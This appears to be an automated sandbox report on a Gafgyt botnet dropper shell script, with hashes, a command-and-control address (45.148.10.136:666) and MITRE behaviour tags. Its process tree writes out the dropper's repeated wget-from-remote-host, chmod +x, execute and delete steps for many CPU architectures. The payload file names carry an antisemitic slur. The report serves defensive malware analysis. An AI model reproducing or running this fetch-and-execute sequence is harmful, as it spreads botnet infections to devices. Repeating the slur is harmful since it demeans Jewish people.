Analysis
-
max time kernel
13s -
max time network
14s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
06/03/2025, 04:36
Static task
static1
Behavioral task
behavioral1
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh
-
Size
1KB
-
MD5
a23e61b3d2822d367944ad0bb171348e
-
SHA1
024cfb180037b542aaad41dd8330f0d797d34bc3
-
SHA256
930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b
-
SHA512
ebc46985695c7fce429f8f4a30fc51f151724ef9114a172c240433d1baf85c49e81f505eb54039de0f835ee57a387b04cf2bd7f43ff02fc75336837bf093ce5b
Malware Config
Extracted
gafgyt
45.148.10.136:666
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 838 chmod 849 chmod 756 chmod 770 chmod 780 chmod 795 chmod 800 chmod 815 chmod 785 chmod 790 chmod 805 chmod 827 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/jew.mips 759 930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 771 jew.mpsl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 743 wget 759 jew.mips 763 rm -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.x32 wget File opened for modification /tmp/jew.arm4 wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.i586 wget File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.ppc wget
Processes
-
/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh/tmp/930de83919cf565a5e3779cb284eea971d3787d605cd68b8702e7097c1172d4b.sh1⤵
- Executes dropped EXE
PID:740 -
/usr/bin/wgetwget http://45.148.10.136/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/chmodchmod +x jew.mips2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/jew.mips./jew.mips2⤵
- System Network Configuration Discovery
PID:759
-
-
/bin/rmrm -rf jew.mips2⤵
- System Network Configuration Discovery
PID:763
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.mpsl2⤵
- Writes file to tmp directory
PID:764
-
-
/bin/chmodchmod +x jew.mpsl2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/jew.mpsl./jew.mpsl2⤵
- Changes its process name
PID:771
-
-
/bin/rmrm -rf jew.mpsl2⤵PID:775
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.sh42⤵
- Writes file to tmp directory
PID:777
-
-
/bin/chmodchmod +x jew.sh42⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/jew.sh4./jew.sh42⤵PID:781
-
-
/bin/rmrm -rf jew.sh42⤵PID:783
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.x862⤵
- Writes file to tmp directory
PID:784
-
-
/bin/chmodchmod +x jew.x862⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/jew.x86./jew.x862⤵PID:786
-
-
/bin/rmrm -rf jew.x862⤵PID:788
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm62⤵
- Writes file to tmp directory
PID:789
-
-
/bin/chmodchmod +x jew.arm62⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/jew.arm6./jew.arm62⤵PID:791
-
-
/bin/rmrm -rf jew.arm62⤵PID:793
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.x322⤵
- Writes file to tmp directory
PID:794
-
-
/bin/chmodchmod +x jew.x322⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/jew.x32./jew.x322⤵PID:796
-
-
/bin/rmrm -rf jew.x322⤵PID:798
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.ppc2⤵
- Writes file to tmp directory
PID:799
-
-
/bin/chmodchmod +x jew.ppc2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/jew.ppc./jew.ppc2⤵PID:801
-
-
/bin/rmrm -rf jew.ppc2⤵PID:803
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.i5862⤵
- Writes file to tmp directory
PID:804
-
-
/bin/chmodchmod +x jew.i5862⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/jew.i586./jew.i5862⤵PID:806
-
-
/bin/rmrm -rf jew.i5862⤵PID:808
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.m68k2⤵
- Writes file to tmp directory
PID:809
-
-
/bin/chmodchmod +x jew.m68k2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/jew.m68k./jew.m68k2⤵PID:816
-
-
/bin/rmrm -rf jew.m68k2⤵PID:819
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.ppc2⤵
- Writes file to tmp directory
PID:820
-
-
/bin/chmodchmod +x jew.ppc2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/jew.ppc./jew.ppc2⤵PID:828
-
-
/bin/rmrm -rf jew.ppc2⤵PID:832
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm42⤵
- Writes file to tmp directory
PID:833
-
-
/bin/chmodchmod +x jew.arm42⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/jew.arm4./jew.arm42⤵PID:840
-
-
/bin/rmrm -rf jew.arm42⤵PID:843
-
-
/usr/bin/wgetwget http://45.148.10.136/jew.arm52⤵PID:844
-
-
/bin/chmodchmod +x jew.arm52⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/jew.arm5./jew.arm52⤵PID:850
-
-
/bin/rmrm -rf jew.arm52⤵PID:852
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD5a328b683ab2e102306ce558ac2848bc0
SHA18e4ca556c8ac6483a4f496736cd6efb645732d13
SHA256596c2174f15304ad6029db214b0f4b5ebb97552be7f9d9a170fe03bbc7c762c1
SHA5128452bcd476ca2f27529fbfa95ed7eb348d0448350857039d7fbf26be21df34084222790becbd00ba6875417ae7f527e9e16c2ff8b6ea4f9a1330bf8b8ddd4505